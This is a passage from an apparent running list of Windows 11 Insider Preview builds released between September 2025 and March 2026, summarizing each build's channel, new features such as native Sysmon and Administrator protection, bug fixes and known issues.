For those who have turned the toggle on to receive the latest updates, this build gradually rolls out several bug fixes, including for one in which the Network and Sharing Center incorrectly displayed two active Wi-Fi connections after switching from one Wi-Fi network to another. The Network and Sharing Center now correctly shows a single active Wi-Fi connection when you connect to a new network.
(Get more info about Windows 11 Insider Preview Build 26220.8079.)
Windows 11 Insider Preview Build 26300.8085
Release date: March 20, 2026
Released to: Dev Channel
For those who have turned the toggle on to receive the latest updates, this build resumes rollout of the Point Indicator Accessibility setting, which enables low-vision users to easily locate and use their cursor. The build also introduces the new Feedback Hub, which offers Insiders simpler navigation and feedback submission flows.
In addition, several bugs were fixed, including one in which the Network and Sharing Center incorrectly displayed two active Wi-Fi connections after switching from one Wi-Fi network to another. The Network and Sharing Center now correctly shows a single active Wi-Fi connection when you connect to a new network.
(Get more info about Windows 11 Insider Preview Build 26300.8085.)
Windows 11 Insider Preview Build 28020.1743
Release date: March 20, 2026
Released to: Canary Channel
For those who have turned the toggle on to receive the latest updates, this build includes several new features being rolled out gradually, including one in which shared audio now provides an individual slider for each listener that adjusts that listener’s volume without affecting the other. You can continue to adjust volume for both listeners at the same time through the main volume controls available through Quick Settings or on-device and keyboard controls.
The build also introduces the new Feedback Hub, which offers Insiders simpler navigation and feedback submission flows.
(Get more info about Windows 11 Insider Preview Build 28020.1743.)
Windows 11 Insider Preview Build 29553.1000
Release date: March 20, 2026
Released to: Canary Channel (29500 build series)
For those who have turned the toggle on to receive the latest updates in the Canary Channel’s optional 29500 build series, this build introduces the new Feedback Hub, which offers Insiders simpler navigation and feedback submission flows.
(Get more info about Windows 11 Insider Preview Build 29553.1000.)
Windows 11 Insider Preview Build 26220.8062
Release date: March 13, 2026
Released to: Beta Channel
For those who have turned the toggle on to receive the latest updates, this build includes numerous changes and refinements, including an update to the “Remove Default Microsoft Store packages” policy for Windows Enterprise and Education SKUs that allows IT administrators to remove MSIX/APPX apps by adding their app package family name (PFNs) to a dynamic list.
Starting with this update, the Windows kernel will enforce a new policy removing default trust for cross-signed drivers. The policy allows third-party drivers from the WHCP program by default, with an allow list of trustworthy publishers and drivers from the cross-signing program.
(Get more info about Windows 11 Insider Preview Build 26220.8062.)
Windows 11 Insider Preview Build 26300.8068
Release date: March 13, 2026
Released to: Dev Channel
For those who have turned the toggle on to receive the latest updates, this build includes numerous changes and refinements, including an update to the “Remove Default Microsoft Store packages” policy for Windows Enterprise and Education SKUs that allows IT administrators to remove MSIX/APPX apps by adding their app package family name (PFNs) to a dynamic list.
Starting with this update, the Windows kernel will enforce a new policy removing default trust for cross-signed drivers. The policy allows third-party drivers from the WHCP program by default, with an allow list of trustworthy publishers and drivers from the cross-signing program.
(Get more info about Windows 11 Insider Preview Build 26300.8068.)
Windows 11 Insider Preview Build 28020.1737
Release date: March 13, 2026
Released to: Canary Channel
For those who have turned the toggle on to receive the latest updates, this build makes refinements to the Pen settings page, including small changes to the options for the pen tail button. A new option, “Same as Copilot key,” enables the pen tail button to launch the same app as the Copilot key.
(Get more info about Windows 11 Insider Preview Build 28020.1737.)
Windows 11 Insider Preview Build 29550.1000
Release date: March 13, 2026
Released to: Canary Channel (29500 build series)
For those who have turned the toggle on to receive the latest updates in the Canary Channel’s optional 29500 build series, this build has a variety of minor changes, including one in which changes to global power settings (for example, Display, Sleep, Hibernate timeouts, Power/Sleep button, and lid close actions) from Settings are now applied to all power plans. This should help improve persistence of chosen settings.
(Get more info about Windows 11 Insider Preview Build 29550.1000.)
Windows 11 Insider Preview Builds 26100.8106 and 26200.8106
Release date: March 12, 2026
Released to: Release Preview Channel
This build introduces a wide range of minor features being rolled out gradually, including the ability to turn Smart App Control (SAC) on or off without needing a clean install. To make changes, go to Settings > Windows Security > App & Browser Control > Smart App Control settings. When turned on, SAC helps block untrusted or potentially harmful apps.
The update also improves stability in Windows Recovery Environment (Windows RE) when you run x64 apps on ARM64 devices. These apps run more smoothly and respond as expected.
(Get more info about Windows 11 Insider Preview Builds 26100.8106 and 26200.8106.)
Windows 11 Insider Preview Build 26220.7961
Release date: March 6, 2026
Released to: Beta Channel
For those who have turned the toggle on to receive the latest updates, this build re-enables Administrator protection, which aims to protect free-floating admin rights for administrator users, allowing them to still perform all admin functions with just-in-time admin privileges. This feature is off by default and can be enabled via OMA-URI in Intune or via group policy.
Other changes and improvements being gradually rolled out to the same group include the ability to use voice typing (Windows key + H) when renaming files in File Explorer, as well as a smaller peek view in the drag tray.
(Get more info about Windows 11 Insider Build 26220.7961.)
Windows 11 Insider Preview Build 26300.7965
Release date: March 6, 2026
Released to: Dev Channel
For those who have turned the toggle on to receive the latest updates, this build re-enables Administrator protection, which aims to protect free-floating admin rights for administrator users, allowing them to still perform all admin functions with just-in-time admin privileges. This feature is off by default and can be enabled via OMA-URI in Intune or via group policy.
Other changes and improvements being gradually rolled out to the same group include the ability to use voice typing when renaming files in File Explorer, as well as a smaller peek view in the drag tray.
(Get more info about Windows 11 Insider Preview Build 26300.7965.)
Windows 11 Insider Preview Build 28020.1685
Release date: March 6, 2026
Released to: Canary Channel
For those who have turned the toggle on to receive the latest updates, this build lets you use voice typing (Windows key + H) when renaming files in File Explorer. The build also improves the reliability of removing Windows Update files and windows.old files via Settings > System > Storage.
(Get more info about Windows 11 Insider Preview Build 28020.1685.)
Windows 11 Insider Preview Build 26220.7934
Release date: Feb. 27, 2026
Released to: Beta Channel
For those who have turned the toggle on to receive the latest updates, this build gives administrators and Application Control for Business policy authors additional controls over the processing of batch files and CMD scripts. Starting with this release, admins can enable a more secure mode for processing batch files that ensures they do not change during execution by adding a value to the registry key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor named LockBatchFilesWhenInUse (DWORD, value 0 or 1). Policy authors can also use the LockBatchFilesWhenInUse application manifest control documented here to enable this mode.
There are a variety of other improvements being rolled out gradually, including one in which a new taskbar indicator displays while you’re sharing, giving a quick reminder that audio is still being shared. Clicking the indicator is a fast path to open sharing settings to change volume or stop sharing.
(Get more info about Windows 11 Insider Preview Build 26220.7934.)
Windows 11 Insider Preview Build 26300.7939
Release date: Feb. 27, 2026
Released to: Dev Channel
For those who opted to receive the latest updates, this build gives administrators and Application Control for Business policy authors additional controls over the processing of batch files and CMD scripts. Starting with this release, admins can enable a more secure mode for processing batch files that ensures they do not change during execution by adding a value to the registry key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor named LockBatchFilesWhenInUse (DWORD, value 0 or 1). Policy authors can also use the LockBatchFilesWhenInUse application manifest control documented here to enable this mode.
There are a variety of other improvements being rolled out gradually, including one in which a new taskbar indicator displays while you’re sharing, offering a quick reminder that audio is still being shared. Clicking the indicator is a fast path to open sharing settings to change volume or stop sharing.
(Get more info about Windows 11 Insider Preview Build 26300.7939.)
Windows 11 Insider Preview Build 28020.1673
Release date: Feb. 27, 2026
Released to: Canary Channel
For those who have opted to receive the latest updates, this build gets a variety of new features being rolled out gradually, including one in which Quick Machine Recovery (QMR) now turns on automatically for enterprise managed Windows Professional devices, as well as Windows Professional devices that are not domain-joined. These devices receive the same recovery features available to Windows Home users. For domain-joined devices, QMR stays off unless it is enabled by the organization.
(Get more info about Windows 11 Insider Preview Build 28020.1673.)
Windows 11 Insider Preview Build 26220.7872
Release date: February 20, 2026
Released to: Beta Channel
For those who have turned the toggle on to receive the latest updates, this build offers a variety of new features, including simplified specifications on the ‘Device info’ Card on the Settings Home page and improved mouseover animations for app groups on the taskbar.
(Get more info about Windows 11 Insider Preview Build 26220.7872.)
Windows 11 Insider Preview Build 26300.7877
Release date: February 20, 2026
Released to: Dev Channel
For those who have turned the toggle on to receive the latest updates, this build offers a variety of new features, including simplified specifications on the ‘Device info’ Card on the Settings Home page and improved mouseover animations for app groups on the taskbar.
Several bugs have also been fixed, including one in which all File Explorer open windows and tabs unexpectedly jumped to Desktop or Home.
(Get more info about Windows 11 Insider Preview Build 26300.7877.)
Windows 11 Insider Preview Build 28020.1619
Release date: February 20, 2026
Released to: Canary Channel
For those who have turned the toggle on to receive the latest updates, this build offers a variety of new features, including one in which Windows Hello Enhanced Sign-in Security (ESS) supports peripheral fingerprint sensors. Previously, ESS was only available on PCs with built-in biometric sensors, but now it can be used when you plug in a supported ESS fingerprint reader.
(Get more info about Windows 11 Insider Preview Build 28020.1619.)
Optional Windows 11 Insider Preview Build 29531.1000
Release date: February 18, 2026
Released to: Canary Channel
This build is the first in a new Canary Channel optional path with a focus on platform development, which will introduce new features before the existing 28000 Canary Channel series. Microsoft recommends that most people remain on the 28000 build path, but adds that those who want to get the newest platform changes as early as possible may want to switch to this new 29500 path. Note, though, that if you switch to the 29500 path by installing this build, you won’t be able to go back to the 28000 Canary Channel series.
The build itself, in Microsoft’s words, “includes platform changes in moving to a new active development build.”
Microsoft warns, “because of the focus on platform development for this path, you may notice a temporary loss in some features that you have today. These features will return to this new active development build.”
(Get more info about Windows 11 Insider Preview Build 29531.1000.)
Windows 11 Insider Preview Build 26220.7859
Release date: February 17, 2026
Released to: Beta Channel
For those who have turned the toggle on to receive the latest updates, this build displays an option to upgrade to a different Microsoft 365 plan on the Accounts page within the Settings app. It also rolls out fixes for several bugs, including one in which all File Explorer open windows and tabs unexpectedly jumped to Desktop or Home.
(Get more info about Windows 11 Preview Build 26220.7859.)
Windows 11 Insider Preview Builds 26100.7918 and 26200.7918
Release date: February 17, 2026
Released to: Release Preview Channel
This build gradually rolls out a variety of new features, including one in which Quick Machine Recovery (QMR) now turns on automatically for Windows Professional devices that are not domain‑joined and not enrolled in enterprise endpoint management. These devices receive the same recovery features available to Windows Home users. For domain‑joined or enterprise managed devices, QMR stays off unless it is enabled by the organization. The build also improves login screen reliability.
(Get more info about Windows 11 Insider Preview Builds 26100.7918 and 26200.7918.)
Windows 11 Insider Preview Build 28020.1611
Release date: February 12, 2026
Released to: Canary Channel
This build brings Sysmon functionality natively to Windows. Sysmon functionality allows you to capture system events that can help with threat detection, and you can use custom configuration files to filter the events you want to monitor. The captured events are written to the Windows event log, enabling them to be used with security applications and in a wide range of use cases.
(Get more info about Windows 11 Insider Preview Build 28020.1611.)
Windows 11 Insider Preview Build 26220.7755
Release date: February 9, 2026
Released to: Beta Channel
For those who have turned the toggle on to receive the latest updates, this build gradually rolls out several new features, including Emoji 16.0, which contains a new set of emojis, and the ability to directly control pan and tilt for supported cameras in the Settings app.
(Get more info about Windows 11 Insider Preview Build 26220.7755.)
Windows 11 Insider Preview Build 26300.7760
Release date: February 9, 2026
Released to: Dev Channel
For those who have turned the toggle on to receive the latest updates, this build gradually rolls out several new features, including Emoji 16.0, which contains a new set of emojis, and the ability to directly control pan and tilt for supported cameras in the Settings app.
(Get more info about Windows 11 Insider Preview Build 26300.7760.)
Windows 11 Insider Preview Build 28020.1546
Release date: February 4, 2026
Released to: Canary Channel
This update, in the words of Microsoft, “includes a small set of general improvements and fixes that improve the overall experience for Insiders” running Windows.
It also fixes one bug that affected apps working with files stored on OneDrive or Dropbox.
(Get more info about Windows 11 Insider Preview Build 28020.1546.)
Windows 11 Insider Preview Build 26220.7752
Release date: February 3, 2026
Released to: Beta Channel
Those who have turned the toggle on to receive the latest updates get Sysmon functionality natively in Windows. Sysmon functionality allows you to capture system events that can help with threat detection, and you can use custom configuration files to filter the events you want to monitor. The captured events are written to the Windows event log, enabling them to be used with security applications and in a wide range of use cases. (This feature is being gradually rolled out.)
The same group also gets a number of bug fixes being gradually rolled out, including for a File Explorer bug in which icons/tooltips for “Add to favorites” were missing.
(Get more info about Insider Preview Build 26220.7752.)
Windows 11 Insider Preview Build 26300.7733
Release date: February 3, 2026
Released to: Dev Channel
Those who have turned the toggle on to receive the latest updates get Sysmon functionality natively in Windows. Sysmon functionality allows you to capture system events that can help with threat detection, and you can use custom configuration files to filter the events you want to monitor. The captured events are written to the Windows event log, enabling them to be used with security applications and in a wide range of use cases. (This feature is being gradually rolled out.)
The same group also gets a number of bug fixes being gradually rolled out, including for a File Explorer bug in which icons/tooltips for “Add to favorites” were missing.
(Get more info about Insider Preview Build 26300.7733.)
Windows 11 Insider Preview Build 28020.1495
Release date: January 28, 2025
Released to: Canary Channel
This build, in Microsoft’s words, “includes a small set of general improvements and fixes that improve the overall experience [of Windows 11].” It also fixes a variety of bugs, including one that led to the Windows Update settings page hanging when loading.
The build has two known issues, one that sometimes causes all open File Explorer windows and tabs to unexpectedly jump to Desktop or Home in File Explorer, and another in which the desktop watermark is showing the wrong build number.
(Get more info about Insider Preview Build 28020.1495.)
Windows 11 Insider Preview Builds 26100.7701 and 26200.7701
Release date: January 27, 2026
Released to: Release Preview Channel
This build gradually rolls out a variety of new features for Copilot+ PCs, including one in which Narrator gives you more control over how it announces on‑screen controls. You can choose which details are spoken and adjust their order to match how you navigate apps. These settings apply throughout the app to help reduce extra speech and make Narrator easier to follow.
The build also immediately rolls out a variety of new features for all PCs, including one in Data Protection Application Programming Interface (DPAPI) domain backup key management. Administrators can now set how often keys rotate automatically. This strengthens cryptographic security and reduces reliance on older encryption algorithms.
(Get more info about Insider Preview Builds 26100.7701 and 26200.7701.)
Windows 11 Insider Preview Build 26220.7670
Release date: January 27, 2026
Released to: Beta Channel
For those who have turned the toggle on to receive the latest updates, this build gradually rolls out several bug fixes, including for an issue in which the Search process was showing an icon with an X instead of a magnifying glass.
The build has five known issues, including one in which some Insiders’ apps aren’t showing in the system tray when they should be.
(Get more info about Insider Preview Build 26220.7670.)
Windows 11 Insider Preview Build 26300.7674
Release date: January 27, 2026
Released to: Dev Channel
In this build, the Dev Channel jumps ahead to receive 26300 series builds. This means that the window to switch from the Dev Channel to the Beta Channel is closed once Build 26300.7674 is installed on your PC. This build for the Dev Channel is identical to the Windows 11 Build 26220.7653 release (see below).
(Get more info about Insider Preview Build 26300.7674.)
Windows 11 Insider Preview Build 26220.7653
Release date: January 21, 2026
Released to: Dev Channel
This build for the Dev Channel is identical to the January 16th Windows 11 Insider Preview Build 26220.7653 released to the Beta Channel. See the writeup below for details.
(Get more info about Windows 11 Insider Preview Build 26220.7653.)
Windows 11 Insider Preview Build 26220.7653
Release date: January 16, 2026
Released to: Beta Channel
For those who have turned the toggle on to receive the latest updates, this build gradually rolls out several changes, including one in which you can now set .webp images for your desktop background in Settings > Personalization > Desktop Background.
The same group also gets a number of bug fixes being gradually rolled out, including for a bug in which Settings crashed when interacting with audio devices.
The build has four known issues, including one in which some Insiders’ apps aren’t showing in the system tray when they should be.
(Get more info about Windows 11 Insider Preview Build 26220.7653.)
Windows 11 Insider Preview Build 28020.1371
Release date: January 14, 2026
Released to: Canary Channel
This build gradually rolls out a variety of bug fixes for those who have turned the toggle on to receive the latest updates, including a bug in which File Explorer showed a white flash when navigating between pages.
There is one known issue in this build: The desktop watermark shows the wrong build number.
(Get more info about Windows 11 Insider Preview Build 28020.1371.)
Windows 11 Insider Preview Build 26220.7535
Release date: January 9, 2026
Released to: Dev & Beta Channels
For those who have turned the toggle on to receive the latest updates, this build gradually rolls out Copilot-powered image descriptions to Narrator on Copilot+ PCs, making it possible for blind and low-vision users to hear detailed, AI-generated descriptions of images, charts, and graphs.
The same group also gets a number of bug fixes being gradually rolled out, including for an issue in which File Explorer was causing explorer.exe to crash for some Insiders when invoking the context menu on the desktop.
The build has seven known issues, including one in which Settings crashes when interacting with audio devices.
(Get more info about Windows 11 Insider Preview Build 26220.7535.)
Windows 11 Insider Preview Build 26220.7523
Release date: December 19, 2025
Released to: Dev & Beta Channels
For those who have turned the toggle on to receive the latest updates, this build gradually rolls out a version of Copilot on the taskbar tailored for commercial customers. It uses Work IQ as contextual information that they can reference in their Copilot chats and with Microsoft 365 AI agents. In addition, the build introduces Agent Launchers, a new framework that enables Windows apps to register AI agents and make them discoverable across the system.
The same group also gets a number of bug fixes being gradually rolled out, including one that addresses an issue in which File Explorer showed a white flash when navigating between pages.
The build has nine known issues, including one in which opening the context menu is causing explorer.exe to crash for some Insiders.
(Get more info about Windows 11 Insider Preview Build 26220.7523.)
Windows 11 Insider Preview Build 28020.1362
Release date: December 15, 2025
Released to: Canary Channel
This build gradually rolls out several new features for Copilot+ PCs, including a streamlined design for the Click to Do context menu that makes frequently used actions like Copy, Save, Share, and Open easier to access. It also rolls out new features for all PCs, including improvements to the dark mode experience in File Explorer.
A variety of bug fixes are being gradually rolled out, including one for an issue in which Settings became unresponsive when attempting to navigate to the Network & Internet section.
(Get more info about Windows 11 Insider Preview Build 28020.1362.)
Windows 11 Insider Preview Build 28000.1340
Release date: December 9, 2025
Released to: Canary Channel
This build has, in Microsoft’s words, a “small set of general improvements and fixes” that improve Windows. It also enables more of the new features and improvements originally released with the October non-security preview update for Windows 11.
In addition, the build fixes a bug that caused some Storage Spaces to become inaccessible or Storage Spaces Direct to fail when creating a storage cluster.
(Get more info about Windows 11 Insider Preview Build 28000.1340.)
Windows 11 Insider Preview Build 26220.7344
Release date: December 5, 2025
Released to: Dev & Beta Channels
For those who have turned the toggle on to receive the latest updates, this build offers native support for the Model Context Protocol (MCP), an open standard that gives AI agents a universal way to connect with apps, tools, and services. Agents can discover and connect to these tools and other agents via a secure, manageable Windows on-device registry (ODR). By default, all agent connectors in the Windows ODR will be contained in a secure environment with their own identity and audit trail.
In addition, Quick machine recovery (QMR) will now be turned on automatically for Windows Professional devices that are not domain joined. These devices will get the same recovery features as Windows Home users. For enterprise computers that are domain joined, nothing changes — QMR will stay off unless your organization turns it on.
Those who have turned the toggle on to receive the latest updates also get a number of bug fixes, including one that addresses a bug in which the search window unexpectedly started floating above the taskbar.
The build has seven known issues, including one in which File Explorer shows a white flash when navigating between pages.
(Get more info about Windows 11 Insider Preview Build 26220.7344.)
Windows 11 Insider Preview Build 26220.7271
Release date: November 21, 2025
Released to: Dev & Beta Channels
This build introduces several features being rolled out gradually for those who have turned the toggle on to receive the latest updates. These include point-in-time restore for Windows, which lets you quickly roll your device back to a previous state to minimize downtime and simplify troubleshooting, and (on NPU devices) fluid dictation in voice typing, which automatically corrects grammar, punctuation, and filler words as you speak.
The build also expands the availability of the Xbox full-screen experience to additional Windows 11 PCs. You can add a controller to your PC for task switching and streamlined gaming on your desktop, laptop, or tablet.
Those who have turned the toggle on to receive the latest updates also get several bug fixes, including one that resolves a hung taskbar after receiving certain notifications.
The build has seven known issues, including one in which File Explorer shows a white flash when navigating between pages.
(Get more info about Windows 11 Insider Preview Build 26220.7271.)
Windows 11 Insider Preview Build 28000.1199
Release date: November 18, 2025
Released to: Canary Channel
This build has, in Microsoft’s words, a “small set of general improvements and fixes” that improve Windows.
(Get more info about Windows 11 Insider Preview Build 28000.1199.)
Windows 11 Insider Preview Builds 26100.7296 and 26200.7296
Release date: November 17, 2025
Released to: Release Preview Channel
This update introduces a wide range of features being rolled out gradually, including several for Copilot+ PCs, such as Windows Studio Effects, which provide AI-powered camera enhancements on an additional, alternative camera such as a USB webcam or your laptop’s built-in rear camera.
All Windows 11 PCs get a variety of new features being gradually rolled out, including Windows Hello Enhanced Sign-in Security (ESS), now supporting peripheral fingerprint sensors. Also, on PCs with the settings “quick machine recovery” and “automatically check for solutions” both enabled, Quick Machine Recovery now runs a one‑time scan by default instead of repeating scans in a loop. If a fix isn’t available right away, QMR will quickly point you to the most appropriate recovery options to get you back up and running.
A bug fix is being immediately rolled out to all PCs to address an issue affecting the Local Security Authority Subsystem Service (LSASS), in which LSASS could become unstable due to an access violation.
(Get more info about Windows 11 Insider Preview Builds 26100.7296 and 26200.7296.)
Windows 11 Insider Preview Build 26220.7262
Release date: November 17, 2025
Released to: Beta and Dev Channels
In this build, those who have turned the toggle on to receive the latest updates get a variety of features being gradually rolled out, including using high-definition voices for English (US) in Narrator and Magnifier that use generative AI to adjust tone and pacing for more natural, expressive speech. Also rolling out is a new “Experimental agentic features” toggle in the Settings app that enables the creation of AI agent accounts and an agent workspace, and grants agentic apps access to your Documents, Downloads, Desktop, Music, Pictures, and Videos folders. (Find out more about experimental agentic features.)
The same group also gets a variety of bug fixes rolled out gradually, including for a bug in which the Task Manager process wasn’t stopping correctly after Task Manager was closed. As a result, Task Manager might have been unexpectedly open on boot.
There are four known issues in this build, including one in which the scrollbar and footer are missing in File Explorer when text is scaled in the dark mode version of the copy dialog.
(Get more info about Windows 11 Insider Preview Build 26220.7262.)
Windows 11 Insider Preview Build 26220.7070
Release date: November 7, 2025
Released to: Beta and Dev Channels
In this build, those who have turned the toggle on to receive the latest updates get a variety of features being gradually rolled out, including the ability to choose your default dashboard in an updated Widget Board Settings.
Everyone gets an updated Quick Machine Recovery in Windows, which makes it easier and quicker to get back to a working PC. The experience in both Windows Settings and the Windows Recovery Environment (WinRE) has been streamlined.
A variety of bug fixes are being rolled out gradually to those who have opted to receive the latest updates, including one that fixes a bug in which the “Automatically hide the taskbar” setting unexpectedly turned off after displaying a message saying, “a toolbar is already hidden on this side of your screen.”
There are five known issues in this build, including one in which the scrollbar and footer are missing in File Explorer when text is scaled in the dark mode version of the copy dialog.
(Get more info about Windows 11 Insider Preview Build 26220.7070.)
Windows 11 Insider Preview Build 28000
Release date: November 7, 2025
Released to: Canary Channel
This build has, in Microsoft’s words, a “small set of general improvements and fixes.” There are also a variety of bug fixes, including for a bug in which the credentials window was not accessible when trying to log in to Outlook.
There are two known issues in this build, one in which sleep and shutdown aren’t working correctly for some Insiders, and the other in which the new Start menu unexpectedly scrolls to the top.
(Get more info about Windows 11 Insider Preview Build 28000.)
Windows 11 Insider Preview Build 27982
Release date: November 4, 2025
Released to: Canary Channel
This build gradually rolls out several new features, including one in which you can add, remove, and rearrange lock screen widgets such as Weather, Watchlist, and Sports on the lock screen. Windows also provides suggested widgets on the lock screen. To customize your lock screen widgets, go to Settings > Personalization > Lock screen.
Also new is a “drag tray” that appears at the top of your screen when you drag a local file from File Explorer or your desktop. You can drop the file into one of the displayed apps or select More to open the Windows share window.
A variety of bugs have been fixed, including one in which, if you used your PC for a while without rebooting, explorer.exe might start crashing repeatedly.
There are two known issues in this build, one in which sleep and shutdown aren’t working correctly for some Insiders, and the other in which the new Start menu unexpectedly scrolls to the top.
(Get more info about Windows 11 Insider Preview Build 27982.)
Windows 11 Insider Preview Build 26220.7051
Release date: October 31, 2025
Released to: Beta and Dev Channels
In this build, those who have turned the toggle on to receive the latest updates get a variety of features being gradually rolled out, including Ask Copilot in the taskbar, which gives you one-click access to Copilot Vision and Voice, so you can search via Copilot using text, voice, or guided support with Copilot Vision. As you type, results appear and update instantly. Turn it on by going to Settings > Personalization > Taskbar > Ask Copilot. You can also manage whether the Copilot app launches automatically at sign-in using the “Auto start on log in” toggle in the Copilot app settings.
The same group gets a variety of bug fixes being rolled out gradually, including one to address an issue in which interacting with a folder or its contents in Start menu could result in the folder becoming invisible.
There are four known issues in this build, including one in which the scrollbar and footer are missing in File Explorer when text is scaled in the dark mode version of the copy dialog.
(Get more info about Windows 11 Insider Preview Build 26220.7051.)
Windows 11 Insider Preview Build 26220.6982
Release date: October 24, 2025
Released to: Dev Channel
In this build, those who have turned the toggle on to receive the latest updates get a variety of changes being gradually rolled out, including Copy & Search, which allows you to search the text in your clipboard with a single click. When you copy text anywhere in Windows, a paste gleam will appear in your search box. Click on this gleam and your copied text will appear in the search field, allowing you to search instantly.
The same group gets a variety of bug fixes, including one for a bug in which the search icon in File Explorer sometimes infinitely looped in an animation.
There are five known issues in this build, including one in which the scrollbar and footer are missing in File Explorer when text is scaled in the dark mode version of the copy dialog.
(Get more info about Windows 11 Insider Preview Build 26220.6982.)
Windows 11 Insider Preview Build 27975
Release date: October 23, 2025
Released to: Canary Channel
This build has, in Microsoft’s words, a “small set of general improvements and fixes” that improve Windows.
A variety of bugs have also been fixed, including one in which Settings crashed when accessing drive information under Settings > System > Storage. This also impacted accessing the drive information from the properties when you right-clicked a drive in File Explorer.
There are two known issues in this build, one in which sleep and shutdown aren’t working correctly for some Insiders, and the other in which the new Start menu unexpectedly scrolled to the top.
(Get more info about Windows 11 Insider Preview Build 27975.)
Windows 11 Builds 26100.7015 and 26200.7015
Release date: October 21, 2025
Released to: Release Preview Channel
This update includes a wide variety of new features being rolled out gradually, including a redesigned Start menu that includes a scrollable All section, has new category and grid views, and which adapts to your screen size. The build also includes new features for Click to Do, which can now translate text into other languages. File Explorer now has a recommended files feature that shows content such as files you frequently use, have recently downloaded, or have added to your File Explorer Gallery.
Two bugs are fixed in this build: one that caused an ACCESS_DENIED error when users attempted to change passwords remotely on member servers or workgroup devices, even when they had the required permissions, and another in which protected content playback failed on some machines after installing KB506408.
(Get more info about Windows 11 Insider Preview Builds 26100.7015 and 26200.7015.)
Windows 11 Insider Preview Build 26220.6972
Release date: October 17, 2025
Released to: Dev Channel
In this build, those who have turned the toggle on to receive the latest updates get a new feature being rolled out slowly, which lets you add and manage your mobile devices from Settings by navigating to “Mobile Devices” under the Bluetooth & Devices section. The page allows you to view your mobile devices, add new mobile devices, and manage features such as using your device as a connected camera or accessing your device’s files in File Explorer.
Those who have turned the toggle on to receive the latest updates get two bug fixes being rolled out slowly, one for a bug that caused File Explorer to show a Catastrophic Error (0x8000FFFF) when extracting large (1.5GB+) archive files, and another that sometimes caused an old white toolbar to randomly appear in File Explorer.
There are five known issues in this build, including one in which the scrollbar and footer are missing in File Explorer when text is scaled in the copy dialog in dark mode.
(Get more info about Windows 11 Insider Preview Build 26220.6972.)
Windows 11 Insider Preview Build 27971
Release date: October 16, 2025
Released to: Canary Channel
In this build, the Notification Center can be used on secondary monitors. You’ll be able to see your calendar on any of your monitors and open Notification Center on any of them by clicking the date and time in the system tray of your taskbar. Note that this functionality will be rolled out gradually.
A variety of bugs have been fixed, including one in which File Explorer crashed when transferring files to a network drive.
There are three known issues in this build, including one in which sleep and shutdown aren’t working correctly for some Insiders.
(Get more info about Windows 11 Insider Preview Build 27971.)
Windows 11 Insider Preview Build 26120.6780
Release date: October 10, 2025
Released to: Beta Channel
In this build, those with Copilot+ PCs who have turned the toggle on to receive the latest updates get a handful of changes and new features, including one in Settings in which more results appear in the search flyout and let you quickly modify the settings you’re searching for.
Those with any PCs who have turned the toggle on get several changes, including a new OneDrive icon in Accounts and Homepages in Settings, and the return of the ability to enable Administrator Protection via Windows Security under Account protection.
The same group gets a variety of bug fixes, including one for an issue in the previous flight in which File Explorer frequently crashed, and another that was causing the Start menu to unexpectedly scroll to the top when interacting with it.
There are four known issues in this build, including one in which the scrollbar and footer are missing in File Explorer when text is scaled in the copy dialog in dark mode.
(Get more info about Windows 11 Insider Preview Build 26120.6780.)
Windows 11 Insider Preview Build 26220.6780
Release date: October 10, 2025
Released to: Dev Channel
This update is identical to Build 26120.6780 for the Beta Channel, detailed above.
(Get more info about Windows 11 Insider Preview Build 26220.6780.)
Windows 11 Insider Preview Build 27965
Release date: October 8, 2025
Released to: Canary Channel
This update introduces a new scrollable Start menu, with “All” on the top level, so apps are accessible without having to navigate to a secondary page. There are also new category and grid views to browse and launch your installed apps in the “All” section. The new menu adapts its size based on your device’s screen size.
There are also several bug fixes, including one in which the taskbar was not autohiding correctly.
There are four known issues in this build, including one in which Settings may crash when accessing drive information under Settings > System > Storage. This also impacts accessing the drive information from the properties when you right-click a drive in File Explorer.
(Get more info about Windows 11 Insider Preview Build 27965.)
Windows 11 Insider Preview Build 27959
Release date: October 6, 2025
Released to: Canary Channel
This update introduces the option to move the hardware indicators for brightness, volume, airplane mode, and virtual desktops to different positions on your screen, including the current bottom position and new top-left and top-center positions.
There are also a variety of bug fixes, including for one in which icons and text sometimes overlapped on the desktop when using increased text scaling.
There is one known issue in this build, in which sleep and shutdown aren’t working correctly for some Insiders.
(Get more info about Windows 11 Insider Preview Build 27959.)
Windows 11 Insider Preview Build 26120.6772
Release date: October 6, 2025
Released to: Beta Channel
In this build, those who have turned the toggle on to receive the latest updates get a variety of new features, including Image Object select for Click to Do in Copilot+ PCs, in which you can hover over your image to preview selectable areas. Once selected, you can copy and paste your object into other apps or use it to kick off a chat with Copilot. Also included are improvements to dark mode for File Explorer for all PCs and the ability to use peripheral fingerprint sensors with Windows Hello. These changes are rolling out gradually.
The same group gets a variety of bugs fixed, including one in which Encrypted File System (EFS) related dialogs in File Explorer weren’t responding to increased text scaling. The bug fixes are rolling out gradually.
There are five known issues in this build, including one in which some searches may show unexpected text instead of the expected results and images.
(Get more info about Windows 11 Insider Preview Build 26120.6772.)
Windows 11 Insider Preview Build 26120.6772
Release date: October 6, 2025
Released to: Dev Channel
This update is identical to Build 26120.6772, detailed above.
(Get more info about Windows 11 Insider Preview Build 26120.6772.)
Windows 11 Insider Preview Build 26120.6760
Release date: September 29, 2025
Released to: Beta Channel
In this build, those who have turned the toggle on to receive the latest updates get a variety of new features, including the ability to do a network speed test straight from the taskbar. You can launch it via the Wi-Fi and Cellular Quick Settings pages or by right-clicking the network icon in the system tray. The tool opens in your default browser and supports testing Ethernet, Wi-Fi, and cellular connections. It helps in assessing network performance and troubleshooting.
The same group gets a variety of bug fixes, including for an issue in which the battery icon got out of sync with the actual charging state — for example, it would show that you weren’t plugged in when you were.
Everyone in the Beta Channel gets a variety of bug fixes, including one for developers that addresses an issue in which PIX on Windows was unable to play back GPU captures.
There are six known issues in this build, including one in which some searches may show unexpected text instead of the expected results and images.
(Get more info about Windows 11 Insider Preview Build 26120.6760.)
Windows 11 Insider Preview Build 26220.6760
Release date: September 29, 2025
Released to: Dev Channel
This build is for those who have already upgraded to Windows 11 version 25H2.
In this build, those who have turned the toggle on to receive the latest updates get a variety of new features, including the ability to do a network speed test straight from the taskbar. You can launch it via the Wi-Fi and Cellular Quick Settings pages or by right-clicking the network icon in the system tray. The tool opens in your default browser and supports testing Ethernet, Wi-Fi, and cellular connections. It helps in assessing network performance and troubleshooting.
The same group gets a variety of bug fixes, including for an issue in which the battery icon got out of sync with the actual charging state — for example, it would show that you weren’t plugged in when you were.
